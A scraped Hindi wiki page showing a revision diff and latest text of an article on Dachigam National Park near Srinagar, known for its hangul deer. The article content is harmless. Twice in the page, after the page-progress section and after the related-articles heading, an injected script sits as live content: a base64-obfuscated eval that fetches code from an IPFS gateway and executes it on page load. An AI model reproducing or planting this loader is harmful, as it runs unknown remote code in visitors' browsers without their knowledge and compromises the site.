Difference between revisions of "दाचीगम राष्ट्रीय उद्यान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 +
[[चित्र:Leopard-Dachigam-National-Park.jpg|thumb|250px|[[तेंदुआ]], दाचीगम राष्ट्रीय उद्यान]]
 
'''दाचीगम राष्ट्रीय उद्यान''' [[जम्मू और कश्मीर]] की राजधानी [[श्रीनगर]] से 22 किमी की दूरी पर स्थित है।  
 
'''दाचीगम राष्ट्रीय उद्यान''' [[जम्मू और कश्मीर]] की राजधानी [[श्रीनगर]] से 22 किमी की दूरी पर स्थित है।  
 
*दाचीगम राष्ट्रीय उद्यान का अर्थ है "दस गाँव"।  
 
*दाचीगम राष्ट्रीय उद्यान का अर्थ है "दस गाँव"।  
Line 4: Line 5:
 
*1910 के बाद एक संरक्षित क्षेत्र बना और पहली बार जम्मू और कश्मीर के महाराजा की देखभाल के अंतर्गत किया गया इसके बाद में संबंधित सरकार के अधिकारियों के निरीक्षण के तहत किया गया है।  
 
*1910 के बाद एक संरक्षित क्षेत्र बना और पहली बार जम्मू और कश्मीर के महाराजा की देखभाल के अंतर्गत किया गया इसके बाद में संबंधित सरकार के अधिकारियों के निरीक्षण के तहत किया गया है।  
 
*श्रीनगर के शहर के लिए स्वच्छ पेयजल की आपूर्ति सुनिश्चित करने के लिए बनाया गया था।  
 
*श्रीनगर के शहर के लिए स्वच्छ पेयजल की आपूर्ति सुनिश्चित करने के लिए बनाया गया था।  
*यह अंत में उन्नत और [[वर्ष]] 1981 में एक राष्ट्रीय उद्यान घोषित किया गया था।
+
*यह अंत में उन्नत और [[वर्ष]] [[1981]] में एक राष्ट्रीय उद्यान घोषित किया गया था।
 
*दाचीगम राष्ट्रीय उद्यान में मुख्य रूप से हंगुल और कश्मीरी हिरण के लिए जाना जाता है।
 
*दाचीगम राष्ट्रीय उद्यान में मुख्य रूप से हंगुल और कश्मीरी हिरण के लिए जाना जाता है।
  
Line 14: Line 15:
 
{{जम्मू और कश्मीर के पर्यटन स्थल}}
 
{{जम्मू और कश्मीर के पर्यटन स्थल}}
 
{{राष्ट्रीय उद्यान और अभयारण्य}}
 
{{राष्ट्रीय उद्यान और अभयारण्य}}
 +
[[Category:श्रीनगर]]
 
[[Category:जम्मू और कश्मीर]]
 
[[Category:जम्मू और कश्मीर]]
 
[[Category:जम्मू और कश्मीर के पर्यटन स्थल]]
 
[[Category:जम्मू और कश्मीर के पर्यटन स्थल]]

Latest revision as of 10:34, 12 July 2012

[[chitr:Leopard-Dachigam-National-Park.jpg|thumb|250px|teandua, dachigam rashtriy udyan]] dachigam rashtriy udyan jammoo aur kashmir ki rajadhani shrinagar se 22 kimi ki doori par sthit hai.

  • dachigam rashtriy udyan ka arth hai "das gaanv".
  • dachigam rashtriy udyan un das gaanvoan ko samarpit kiya gaya hai jinhoanne is rashtriy udyan ke gathan ke lie apani jagah badali thi.
  • 1910 ke bad ek sanrakshit kshetr bana aur pahali bar jammoo aur kashmir ke maharaja ki dekhabhal ke aantargat kiya gaya isake bad mean sanbandhit sarakar ke adhikariyoan ke nirikshan ke tahat kiya gaya hai.
  • shrinagar ke shahar ke lie svachchh peyajal ki apoorti sunishchit karane ke lie banaya gaya tha.
  • yah aant mean unnat aur varsh 1981 mean ek rashtriy udyan ghoshit kiya gaya tha.
  • dachigam rashtriy udyan mean mukhy roop se hangul aur kashmiri hiran ke lie jana jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>